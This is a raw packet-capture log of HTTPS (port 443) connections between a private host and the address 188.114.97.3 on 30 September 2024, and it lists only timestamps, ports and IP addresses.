Sep 30, 2024 18:20:02.318912029 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.318991899 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.319650888 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.319658995 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.319706917 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.319726944 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.319750071 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.319787979 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.319812059 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.320360899 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.320368052 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.320413113 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.321322918 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.321330070 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.321388960 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.321392059 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.321404934 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.321448088 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.322232962 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.322283030 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.322298050 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.322352886 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.323153973 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.323204041 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.323242903 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.323293924 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.324189901 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.324326038 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.324342012 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.324398994 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.325171947 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.325237036 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.325994968 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.326061010 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.326836109 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.326900959 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.326911926 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.326941967 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.326967001 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.327012062 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.327910900 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.327967882 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.328507900 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.328567028 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.328942060 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.329005957 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.329612970 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.329672098 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.330822945 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.330883980 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.330884933 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.330909014 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.330956936 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.330957890 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.331459045 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.331537008 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.331553936 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.331671953 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.331701040 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.331703901 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.331705093 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.331724882 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.331778049 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.331778049 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.332380056 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.332437038 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.332484007 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.332536936 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.332592964 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.332648993 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.332659960 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.332685947 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.332717896 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.332736969 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.333268881 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.333324909 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.333405018 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.333460093 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.333473921 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.333534002 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.333539963 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.333550930 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.333606958 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334079027 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334162951 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334161997 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334175110 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334207058 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334229946 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334367037 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334413052 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334427118 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334439039 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.334470987 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.334491014 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.335107088 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335180044 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.335182905 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335206032 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335249901 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.335258007 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335308075 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.335340023 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335361004 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:02.335407972 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.357590914 CEST	49708	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:02.357633114 CEST	443	49708	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:08.917849064 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:08.917911053 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:08.918021917 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:09.541605949 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:09.541651964 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.000351906 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.000574112 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.037434101 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.037461996 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.037883997 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.049669981 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.091404915 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.159825087 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.159878016 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.160052061 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.160077095 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.165543079 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.165585995 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.165602922 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.165613890 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.165693045 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.165699959 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.170537949 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.170568943 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.170598030 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.170603037 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.170614004 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.170659065 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.176407099 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.176464081 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.176471949 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.246763945 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.246794939 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.246814966 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.246822119 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.246841908 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.246864080 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.247111082 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247152090 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.247154951 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247165918 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247212887 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.247221947 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247771025 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247801065 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247814894 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.247823000 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247852087 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247862101 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.247869015 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.247914076 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.248539925 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.248656034 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.248681068 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.248696089 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.248704910 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.248743057 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.249413013 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.249562979 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.249591112 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.249605894 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.249614000 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.249655962 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.250219107 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.250264883 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.250304937 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.250312090 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.333777905 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.333811045 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.333841085 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.333853960 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.333864927 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334014893 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.334182978 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334197044 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334249020 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.334255934 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334269047 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334300041 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334321022 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.334328890 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.334340096 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.335136890 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.335180998 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.335187912 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.335232019 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.335658073 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.335706949 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.335828066 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.335875988 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.336632013 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.336683989 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.336745977 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.336792946 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.337682962 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.337717056 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.337735891 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.337742090 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.337754011 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.337769985 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.337780952 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.337785959 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.337810993 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.338538885 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.338567972 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.338587999 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.338597059 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.338620901 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.339456081 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.339499950 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.339508057 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.339550018 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.420695066 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.420753956 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.420764923 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.420814037 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.420886993 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.420928955 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.420933962 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.420942068 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.420975924 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.421082973 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.421134949 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.421247959 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.421318054 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.421385050 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.421412945 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.421430111 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.421436071 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.421462059 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.421475887 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.422036886 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.422090054 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.422156096 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.422199965 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.422358036 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.422386885 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.422408104 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.422416925 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.422431946 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.422466993 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423017025 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.423063993 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423080921 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.423127890 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423295975 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.423325062 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.423343897 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423350096 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.423361063 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423403025 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.423978090 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424030066 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.424077034 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424124956 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.424277067 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424307108 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424320936 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.424326897 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424350977 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.424365997 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.424875021 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.424925089 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425029039 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.425080061 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425327063 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.425359964 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.425368071 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425395966 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425401926 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.425441027 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425868034 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.425915956 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.425955057 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.426002979 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.507638931 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.507704973 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.507754087 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.507783890 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.507801056 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.508145094 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508167982 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508213043 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.508219957 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508255005 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.508620977 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508636951 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508693933 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.508702040 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.508728027 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.509068012 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.509085894 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.509123087 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.509129047 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.509167910 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.512626886 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.512649059 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.512696981 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.512706041 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.512744904 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.513216019 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513233900 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513283968 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.513293028 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513304949 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.513657093 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513678074 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513716936 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.513781071 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.513791084 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.513998032 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.514012098 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.514054060 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.514061928 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.514090061 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.577673912 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.594820023 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.594835043 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.594877958 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.594898939 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.594912052 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.595000029 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.595024109 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.595062971 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.595083952 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.595088959 CEST	443	49711	188.114.97.3	192.168.2.10
